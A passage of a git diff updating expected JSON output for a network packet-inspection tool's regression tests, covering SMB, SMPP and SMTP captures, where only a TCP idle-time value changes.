+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} +01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":101,"total-skipped-flows":0,"total-l4-data-len":25252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584368317802} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 101/101 diff --git a/test/results/smbv1.pcap.out b/test/results/smbv1.pcap.out index 8732cf57a..240b5736a 100644 --- a/test/results/smbv1.pcap.out +++ b/test/results/smbv1.pcap.out @@ -1,11 +1,11 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smbv1.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492191036092} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492191036092,"flow_last_seen":1492191036092,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1492191036092,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} -00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} -01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -01040{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7440000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492191036092,"flow_last_seen":1492191036092,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1492191036092,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} +00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} +01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +01040{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7560000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":819,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492191036191} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 diff --git a/test/results/smpp_in_general.pcap.out b/test/results/smpp_in_general.pcap.out index b7ef20442..4886c3c83 100644 --- a/test/results/smpp_in_general.pcap.out +++ b/test/results/smpp_in_general.pcap.out @@ -1,11 +1,11 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smpp_in_general.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1217149853878} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1217149853878,"flow_last_seen":1217149853878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1217149853878,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1217149853878,"flow_last_seen":1217149853878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1217149853878,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-data-len":200,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1217149884833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 diff --git a/test/results/smtp-starttls.pcap.out b/test/results/smtp-starttls.pcap.out index 9b9d065c1..e47427cf7 100644 --- a/test/results/smtp-starttls.pcap.out +++ b/test/results/smtp-starttls.pcap.out @@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtp-starttls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 